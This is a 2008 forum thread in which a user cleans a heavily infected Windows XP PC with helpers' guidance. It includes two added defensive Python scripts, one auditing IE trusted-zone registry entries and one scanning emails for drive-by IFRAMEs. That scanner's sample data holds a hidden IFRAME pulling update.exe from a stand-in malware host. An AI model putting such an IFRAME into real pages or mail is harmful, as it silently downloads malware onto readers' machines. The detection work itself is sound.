TechSpot

Preliminary AVG AS to Super AS

By altair9
May 7, 2008
  1. Hello!

    I have never cleaned the computer (Win XP 32-bit SP2 - AMD K7 1000 MHz); only an obsolete Norton Internet Security 2005 + Norton Antivirus was installed...

    Yesterday I installed some free antimalware utilities (I had lots of popups, slow browsing, etc...) and found more than 500 infections in total!!! Some very dangerous. Initially some rootkits crashed the system (blue screen) while running an Ad-Aware full scan. I gradually removed them with some freeware utilities and then I used Ad-Aware... But once it found the system "Clean", the new PC Tools Doctor (free version) found lots of other problems... I manually removed all the files and registry keys... but I always found some infections (fewer).

    Browsing these forums, I found lists of files that I should delete and that I have! For example: swxcacls.exe - swsc.exe - etc...

    So NOW I have found and am running the excellent "preliminary removal instructions" step by step.

    I completely uninstalled Norton. I installed the beautiful COMODO Firewall Pro.

    Now I'm running the Trend Micro online virus scanner, but I have ALREADY installed (last night) the latest version of HJT, SuperAntiSpyware Home Free (latest version), and Ad-Aware 2007 (latest version).

    These are my questions:

    1) Should I uninstall them, re-download and re-install them? Or are the installed ones good? (I disabled all the real-time monitoring programs.)

    2) I already have AVG Antivirus 7.0 installed on my system. It is updated. Now there is 8.0. What should I do? Should I uninstall 7.0 (but it is live-updated) and install 8.0, or is 7.0 good enough?

    3) In the first case, should I redo the Trend Micro online virus scan of my system? Should I uninstall COMODO Firewall Pro, then install AVG 8.0 and then re-install COMODO Firewall Pro (so that I follow your step-by-step instructions), or may I leave it installed while installing AVG 8.0 if necessary?

    MOST IMPORTANT:
    4) "Step 14": "Run AVG AntiSpyware".... But it does not exist any more! I read in your reply yesterday:

    * Many, many changes before writing this.
    * Step 6, contributed by Blind Dragon. Updated AVG AS for SuperAntiSpyware OR Malwarebytes' Anti-Malware.

    And I already installed SuperAntiSpyware; but what about the AVG AS log file that you want me to attach here? Should I use the anti-spyware capabilities of the new AVG 8.0 and attach its log (if it makes a log!), or should I attach the Super AS log in place of the AVG AS log?

    Thank you very much - you do great work!
     
  2. Bobbye

    Bobbye Helper on the Fringe Posts: 16,335   +36

    You should realize that each set of malware cleaning instructions is specific to the user who has the malware. The directions given to that person may not be appropriate for you. Therefore you should begin at the beginning:

    http://www.techspot.com/vb/topic58138.html

    posting your logs as instructed. Then you will be helped individually and the help will be directed to the results of your particular logs.
     
  3. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    thank you

    thank you for your prompt reply, Bobbye.

    The topic you pointed me to (58138) is the procedure I'm running! I'm exactly at step no. 3, and all my questions concern this procedure:

    Viruses/Spyware/Malware, preliminary removal instructions

    Now the Trend Micro scan is finished and it deleted and removed some malware... and it asked me to repeat the scan to be sure.... it seems a good idea, but it takes about 2-3 hours!!!!
     
  4. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    Yes, I already messaged Julio about step 14 needing to be updated as well after updating step 6.

    If you want to install AVG 8.0, it is fine to leave the other programs in place. SuperAntiSpyware won't conflict with AVG AntiSpyware, which is now bundled with the AVG antivirus. That is the reason for the update: what if users want Avast or, my recommendation, Avira AntiVir instead of AVG? Then there is no way for them to get only AVG AS without having a 2nd AV product.

    Leave Comodo and Ad-Aware 2007, as they have nothing to do with these instructions.

    So in short - if you want AVG as your antivirus you will also get AVG AS, which will NOT conflict with the other antispyware suggestions. If you want another AV product such as Avast or AntiVir then you still have no conflict. Don't worry about step 14 unless you do get AVG. I would also recommend, if you get the new AVG, opting out of the toolbar that it wants to install.

    You don't want:
    More than 1 active firewall
    More than 1 active anti-virus
    More than 1 real-time protection from antispyware

    The free versions of MBAM and SAS don't have real-time protection anyway; they are scanners only.
     
  5. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    ok

    Thank you too Blind Dragon.

    I'm going to:

    - Uninstall the current AVG 7.0 (without rebooting). Or should I reboot?
    - Install AVG 8.0
    - Update it

    And then what should I do? Should I reboot? Should I leave AVG 8 active or inactive? (Then I'll do STEP 5.)

    Thank you again.
     
  6. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    After the install you want AVG active but the AVG AntiSpyware real-time protection disabled, as it can interfere with the other instructions.

    You are going to boot into safe mode and scan with AVG AV, then AVG AS. The only thing that is disabled is the real-time protection:
    • Select the icon at the top that says SHIELD, then at the top of the left pane change "Resident Shield is ..." from Active to Inactive
    • Select the icon at the top that says UPDATE, then Start Update in the left pane
    • After the update, click on the Scanner icon at the top, then select the Settings tab; in the first section "How to act?" click on Recommended actions and change it to Delete. In the Reports section make sure it is set to Automatically generate report after every scan
    • Click back to the Scan tab and select Complete System Scan
    • Finally, after the scan, select the Infections icon at the top, click Select All at the bottom, then finally Remove, also at the bottom
     
  7. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    I edited the above with more detail for you to save or print for use while in safe mode.
     
  8. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    Ok.

    So now:

    1) I'll uninstall the older AVG 7.5
    2) I'll reboot to let Windows make the uninstall effective
    3) I'll install the new AVG 8.0
    4) I'll reboot if it asks me; if not, I'll go directly to:
    5) all the steps you just wrote for me.

    Then I'll repeat the scan after booting into SAFE MODE, because in SAFE MODE the internet connection doesn't work, so I couldn't update AVG (Wi-Fi to a D-Link router...).

    Thank you.
     
  9. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    1) I'll uninstall the older AVG 7.5
    2) I'll reboot to let Windows make the uninstall effective
    3) I'll install the new AVG 8.0
    4) I'll reboot if it asks me; if not, go directly to:
    5) • Select the icon at the top that says SHIELD, then at the top of the left pane change "Resident Shield is ..." from Active to Inactive
       • Select the icon at the top that says UPDATE, then Start Update in the left pane
       • After the update, click on the Scanner icon at the top, then select the Settings tab; in the first section "How to act?" click on Recommended actions and change it to Delete. In the Reports section make sure it is set to Automatically generate report after every scan

    6) Later, when you boot into safe mode, you will:
       • Click back to the Scan tab and select Complete System Scan
       • Finally, after the scan, select the Infections icon at the top, click Select All at the bottom, then finally Remove, also at the bottom

    So you want to update it and set the correct settings now while you have access to the forum; then later, in Step 14 when you are in safe mode, you will scan. The reason is so that infected files are not active and running.
     
  10. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    OK, thank you, very useful tips!

    Now it's installing the new AVG and the Wi-Fi USB antenna is unplugged (to be sure...)... I'm writing from a friend's computer...

    When the installation finishes, I'll plug the Wi-Fi USB antenna back in and do all of your steps.

    I'll let you know...

    Thanks again.
     
  11. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    Not a problem. Good luck, and if you are unsure at any point, stop to ask.
     
  12. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    smitfraudfix...

    Hello...

    Using SmitFraudFix in SAFE MODE.... did "clean".. etc....

    But now.... what is this "trusted zone"?

    All the sites say that "it lets us restore the trusted zone"... but nobody explains what this trusted zone is.....

    Should I run this option too?

    Thanks.
     
  13. Bobbye

    Bobbye Helper on the Fringe Posts: 16,335   +36

    A firewall works by having network connections divided into three zones:

    The "trusted zone" generally includes the user's Local Area Network and can share resources such as files and printers.
    The "Internet zone" includes everything not in the trusted zone. The user can specify which "permissions" (trusted zone client, trusted zone server, Internet zone client, Internet zone server) to give to a program before it attempts to access the Internet (e.g. before running it for the first time).

    The third zone can be used to block domains and/or specific URLs.
     
  14. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    Yep, some infections will add themselves to the trusted zone in your browser; then they can redirect you, or they may be known bad sites that your browser normally blocks but which afterwards let you get redirected there anyway. It's really not necessary, as we can use other tools to prevent this if it is a problem.
     
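    The "trusted zone" that Blind Dragon describes above is Internet Explorer's per-site zone assignment, which IE stores in the registry under the ZoneMap\Domains key; a site placed in the Trusted sites zone runs with relaxed security settings, which is why malware adds itself there. The script below is an added example written for this page (not code from the thread, from SmitFraudFix or from any of the tools mentioned): it parses a `.reg` export of that key and lists every host assigned to the Local intranet (1) or Trusted sites (2) zone. The zone IDs are IE's own; the registry text in the script is a constructed sample and its host names are illustrative. On the affected machine the real data can be exported with `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains" zonemap.reg` (reg.exe writes UTF-16, which the script's file mode expects).

```python
"""Added example: list sites placed in Internet Explorer's Local intranet /
Trusted sites zones, from a .reg export of the ZoneMap\\Domains key.

Zone IDs are Internet Explorer's own: 0 My Computer, 1 Local intranet,
2 Trusted sites, 3 Internet, 4 Restricted sites.
"""
import re
import sys

ZONE_NAMES = {
    0: "My Computer",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}
PERMISSIVE_ZONES = (1, 2)  # zones a home user normally has not populated by hand

# Constructed sample of what `reg export` produces for the ZoneMap\Domains key.
# The host names are illustrative only.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\example.com]
"http"=dword:00000002

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\example.com\www]
"*"=dword:00000002

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\update.example.org]
"https"=dword:00000002

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\blocked.example.net]
"*"=dword:00000004
"""

DOMAINS_KEY = r"\Internet Settings\ZoneMap\Domains"
KEY_RE = re.compile(r"^\[(?P<path>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<scheme>[^"]+)"=dword:(?P<zone>[0-9A-Fa-f]{8})$')


def parse_zonemap(reg_text):
    """Return (host, scheme, zone) tuples for every ZoneMap\\Domains entry.

    A key Domains\\example.com\\www maps to the host www.example.com; each
    value name is a URL scheme ("*" meaning any) and its DWORD is the zone ID.
    """
    entries = []
    host = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            path = key.group("path")
            host = None
            idx = path.find(DOMAINS_KEY)
            if idx != -1:
                rest = path[idx + len(DOMAINS_KEY):].strip("\\")
                if rest:
                    host = ".".join(reversed(rest.split("\\")))
            continue
        value = VALUE_RE.match(line)
        if value and host is not None:
            entries.append((host, value.group("scheme"), int(value.group("zone"), 16)))
    return entries


def permissive_entries(entries, zones=PERMISSIVE_ZONES):
    """Keep only entries assigned to a zone with relaxed security settings."""
    return [e for e in entries if e[2] in zones]


def report(reg_text):
    """Human-readable lines for the permissive entries in a .reg export."""
    return [
        "%-30s %-6s -> %s" % (host, scheme, ZONE_NAMES.get(zone, zone))
        for host, scheme, zone in permissive_entries(parse_zonemap(reg_text))
    ]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # reg.exe writes its export as UTF-16 with a byte-order mark
        with open(sys.argv[1], encoding="utf-16") as fh:
            text = fh.read()
    else:
        text = SAMPLE_REG
    for line in report(text):
        print(line)
```

    Run with no arguments it reports the three trusted entries in the sample and ignores the one in the Restricted sites zone. Two caveats: the same layout exists under HKLM (used when the "use only machine settings" policy is set), so export and check that hive too, and IP-address assignments live in a sibling ZoneMap\Ranges key that this script does not parse.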
  15. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    continuing the steps....

    32 hours with the computer... my eyes are burning red!

    I have almost finished the "preliminary..." procedure.

    I arrived at the step of making a complete antivirus scan in SAFE MODE.

    But... AVG 8.0 can't scan as a GUI app in SAFE MODE: only from the command line!

    Whereas all the other programs of the first 10-12 or so steps found nothing (thanks to the online Trend Micro HouseCall scanner that cleaned lots of things, and thanks to other programs like Ad-Aware in the other steps... and hours and hours of work...), despite all these procedures (and CCleaner and the three tools of step 10, etc...), the AVG command line finds a lot of:

    - Adware Generic - ActiveX compatibility (in the registry).

    - an Adware Shorty, an Adware Virtumonde (again ActiveX compatibility)
    - a Trojan.Zapchast (again ActiveX compatibility)

    Now it is scanning the hard disk files.... And I can't make a log of this scan, because it is on a command line and the prompt has a short vertical scroll bar: it can only go up and down a bit.

    Here are my questions:

    1) How can I tell you what AVG found?

    2) You could tell me: "see step 14 and run the AVG AntiSpyware, and attach the log file in the forum". But here's the problem: AVG AntiSpyware doesn't exist any more; now its antispyware capabilities are in AVG Antivirus 8.0, but that can only run from the command line if Windows is in SAFE MODE, so NO REPORT!
    If I use SuperAntiSpyware it finds... NOTHING! So:

    3) How can I replace AVG AntiSpyware? Another equivalent free product? I have also installed PC Tools Spyware Doctor; is this good?

    4) Or should I run the AVG complete scan (malware too) in Windows Normal mode and save a log (if possible!!)?

    Thank you very much.

    Talk to you soon...

    PS: maybe a "solution": I tried to add "> filename" to the command line... but while it processes I see nothing (and the process is very long...) and I fear that the file will grow into an encyclopaedia.... EACH of the more than 500,000 files shown in it... plus the whole registry... (So I stopped it with CTRL C) ... but I bet that you are burning to read this file... COMPLETE!! :D :D
     
  16. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    I can do without the log. I usually like to check them to make sure it says that the files it found are quarantined or deleted, vs. no action taken by the user.
     
  17. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    no!... more hours of scanning.... :(
    I used the option /clean (with others...), not the option /trash (now I remember... I found it on the web...)....

    don't tell me that I must re-scan the whole computer... it is still working... the "windows" folder is a black hole that approaches infinity...

    I run this:

    avgscanx /comp /heur /clean /boot /pup /reg /coo

    /comp = complete whole computer
    /heur = heuristic scan (I hope that it doesn't exclude the normal scan but ADDS the heuristic scan!)
    /clean = I don't know exactly what "clean" means
    /boot = scan the boot sector too
    /pup = potentially unwanted programs (if I remember correctly...)
    /reg = registry
    /coo = cookies

    I don't know if /clean DELETES the files and the strings that couldn't be cleaned, or if it leaves them there!
     
  18. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    F I N I S H E D !!!!

    FINISHED!

    I ran the whole procedure "preliminary removal instructions".

    These are the results:

    ...

    Step 3 Trend Micro online antivirus:

    I did it twice, because the first time I had problems and I restarted the WHOLE procedure. The first time it revealed lots of problems, CLEANED them and finished the scan.

    The second time (the good whole procedure), it found only 2 "problems", and it healed one, but the other... it couldn't finish the cleaning process and I had to close the browser page!

    I attach a screenshot of the last unresolved, unremoved problem. Its name:
    Trendmicro.jpeg

    ...

    STEP 11:

    The Panda Anti-Rootkit program: since at this step of the procedure I was offline with the Wi-Fi antenna unplugged (to be sure), I couldn't update it, but I launched it anyway.
    These are the RESULTS:

    No rootkits have been found.

    For all items I read a beautiful "0".

    But then, after STEP 14, when I rebooted in NORMAL mode and reconnected to the Internet, before launching HijackThis (whose file I renamed in STEP 5), I re-launched Panda Anti-Rootkit and let it upgrade.

    So it told me that to scan the computer it had to reboot (after the upgrade), and I did this.
    RESULTS: the same: "No rootkits have been found".


    STEP 12:

    COMBOFIX.

    I attach the file. Name:

    ComboFix.txt


    DECKARD's SYSTEM SCANNER:

    I attach the files. Names:

    dss_main.txt
    dss_extra.txt



    STEP 13:

    Unfortunately I FORGOT to re-hide the hidden and system files after step 14. I hope that this will not affect the procedure....

    I ran AVG 8.0, updated, in Windows SAFE MODE: it ran itself on the COMMAND LINE.



    STEP 14:

    SPYBOT SEARCH AND DESTROY found only 1 entry: SpyBossPro: an ijl11.dll in the system32\ folder. I fixed it.

    ADAWARE: I couldn't find and uncheck "scan for negligible risk entries", but I ran a Full system scan. Results:

    Infection detected: 1:
    Family Id: 789 Name: WhenU.DesktopToolbar Category: Misc TAI:5
    Item Id: 14037 Value: File: C:\System Volume Information\_restore{BB13918B-D6B0-4455-9C07-07AEF547CF22}\RP351\A0080382.ocx

    CLEANED.


    AVG AntiSpyware: since it doesn't exist any more and since the new AVG 8.0 has an antispyware inside, I'll attach two "artisan pseudo-reports": two screenshots of the Command Prompt showing the more relevant screens of the process.
    File names:

    avg-cmdln1.JPG
    avg-cmdln2.JPG


    I hope these two files can replace a valid old AVG AntiSpyware log file...



    Finally, STEP 15: Hijackthis.

    Log file name:

    hijackthis


    I hope all this helps...

    Thank you VERY VERY MUCH!
     
  19. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    missed attachments (no more than 5...)

    And here are the other two missing attachments:


    avg-cmdln2.JPG
    hijackthis.txt




    Thank you again!

    PS: is there a way to set a password to "close" some resident applications (like Comodo Firewall Pro, PC Tools Spyware Doctor and AVG), to prevent other users from disabling them because they are a bit annoying?
    I can't make more user accounts, only one... used as administrator too... Thank you.
     
  20. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    One more scan for me

    Run Kaspersky Online AV Scanner

    In order to use it you have to use Internet Explorer.
    Go to Kaspersky and click the Accept button at the end of the page.

    Note for Internet Explorer 7 users: If at any time you have trouble with the Accept button of the licence, click on the Zoom tool located at the bottom right of the IE window and set the zoom to 75%. Once the license is accepted, reset to 100%.
    • Read the Requirements and limitations before you click Accept.
    • Allow the ActiveX download if necessary.
    • Once the database has downloaded, click Next.
    • Click Scan Settings and change the "Scan using the following antivirus database" from standard to extended and then click OK.
    • Click on "My Computer"
    • When the scan has completed, click Save Report As...
    • Enter a name for the file in the Filename: text box and then click the down arrow to the right of Save as type: and select text file (*.txt)
    • Click Save - by default the file will be saved to your Desktop, but you can change this if you wish.
    Attach the report to your next reply.
     
  21. Bobbye

    Bobbye Helper on the Fringe Posts: 16,335   +36

    C:\PROGRA~1\AVG\AVG8\avgtray.exe
    C:\PROGRA~1\AVG\AVG8\avgrsx.exe
    These processes are part of AVG 8. AVG v8 has an antivirus program and antispyware.


    You need to remove this left-over Norton AV entry. Use the Norton Removal Tool:
    http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/docid/2005033108162039
    O23 - Service: SymWMI Service (SymWSC) - Symantec Corporation - C:\Programmi\File comuni\Symantec Shared\Security Center\SymWSC.exe
    Description: Installed by Norton Internet Security Center.

    Subject to approval of Blind Dragon.
     
  22. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    ok

    Thank you! I launched the Kaspersky scan.... and am waiting for it.... then I'll post the results in txt format...
     
  23. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    ....

    ...where the others have been unsuccessful....

    Kaspersky found something!

    Scan progress: 51% right now...

    Until now it found:

    Number of viruses found: 8
    Number of infected objects: 18
    Number of suspicious objects: 7


    About 10 objects in this mysterious folder (heavily problematic with the latest antiviruses too...):

    C:....hey! I can't find it even with hidden and system files shown!

    I remember... it was something like.... C:\WINDOWS\Recovery.... or something like that.

    ...one can never be sure...!


    To Bobbye:
    I'm going to use the Norton Removal Tool after this procedure... Thank you too!
     
  24. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    Here's the report

    Finished.

    It found:

    Number of viruses found: 13
    Number of infected objects: 35
    Number of suspicious objects: 7

    Here's the report.

    It talks about objects "closed", etc... What should I do? Delete everything?

    thank you...
     
  25. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    Please, while judging the report, consider that entries like this:

    D:\CD\Outlook Express\Posta in arrivo.dbx/[From Mail Delivery Subsystem <MAILER-DAEMON@aol.com>][Date Fri, 6 Dec 2002 19:55:57 -0500 (EST)]/UNNAMED Suspicious: Exploit.HTML.Iframe.FileDownload skipped

    concern the archive of my old emails. So if I delete the files, I'll delete ALL the e-mails! So, please tell me whether I should re-import the mails, delete THOSE messages and re-export to another folder, and please tell me whether this carries any risk (because I would have to open the messages and click on them to delete them), or whether I can do this.

    Attachment in the previous post.

    Thank you very much.
     
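    The Kaspersky entry quoted above flags a message inside the Outlook Express archive whose HTML body carries an IFRAME that fetches a file (that is what the Exploit.HTML.Iframe.FileDownload name describes). The script below is an added example of the same idea, written for this page and not Kaspersky's signature or anything posted in the thread: it walks plain RFC 822 messages (the text you get by exporting a folder to .eml files; it does not read the binary .dbx format) and reports those whose text/html parts contain an IFRAME that either points at an executable or is hidden by zero size or inline CSS, so the offending message can be located by index and subject without rendering it in a mail client. The three messages are constructed samples; the domains and file names in them are made up.

```python
"""Added example: find mail messages whose HTML body carries an IFRAME that
pulls a file, without rendering them in a mail client.  Works on plain
RFC 822 messages (.eml text); it does not read the binary Outlook Express .dbx."""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

# File extensions Windows will execute if the browser saves and opens them
DANGEROUS_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".hta", ".vbs", ".js")

# Constructed sample messages; the domains and file names are made up.
SAMPLE_MESSAGES = [
    """From: Mail Delivery Subsystem <MAILER-DAEMON@example.com>
To: user@example.com
Subject: Returned mail
Date: Fri, 6 Dec 2002 19:55:57 -0500
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body>
<p>Your message could not be delivered.</p>
<iframe src="http://malware.example.net/update.exe" width="0" height="0"></iframe>
</body></html>
""",
    """From: friend@example.com
To: user@example.com
Subject: Holiday photos
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body><p>See the album:</p>
<iframe src="http://photos.example.com/album" width="400" height="300"></iframe>
</body></html>
""",
    """From: news@example.com
To: user@example.com
Subject: Weekly newsletter
Content-Type: text/plain; charset="us-ascii"

Plain text only; nothing to parse.
""",
]


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> in an HTML document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def is_hidden(attrs):
    """True if the frame is sized to zero or hidden with inline CSS."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return any(attrs.get(k, "").strip().rstrip("px").strip() == "0"
               for k in ("width", "height"))


def classify_iframe(attrs):
    """Return a reason if the iframe looks like a drive-by file download, else None."""
    src = attrs.get("src", "")
    if urlsplit(src).path.lower().endswith(DANGEROUS_EXT):
        return "iframe src points at an executable: " + src
    if is_hidden(attrs):
        return "hidden iframe loading " + src
    return None


def scan_message(raw):
    """Return (subject, [reasons]) for one RFC 822 message given as text."""
    msg = email.message_from_string(raw, policy=policy.default)
    reasons = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = IframeCollector()
        collector.feed(part.get_content())
        reasons.extend(r for r in map(classify_iframe, collector.iframes) if r)
    return str(msg.get("Subject", "")), reasons


def scan_mailbox(raw_messages):
    """Return (index, subject, reasons) for every message that triggers."""
    hits = []
    for idx, raw in enumerate(raw_messages):
        subject, reasons = scan_message(raw)
        if reasons:
            hits.append((idx, subject, reasons))
    return hits


if __name__ == "__main__":
    for idx, subject, reasons in scan_mailbox(SAMPLE_MESSAGES):
        print("message %d (%s):" % (idx, subject))
        for reason in reasons:
            print("   ", reason)
```

    The parser never executes script or fetches the IFRAME target; it only reads the tag attributes, so running it over a folder of exported messages is safe. A visible, normally sized frame pointing at an ordinary page (the second sample) is deliberately not reported, to keep the output to entries worth deleting.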
Topic Status:
Not open for further replies.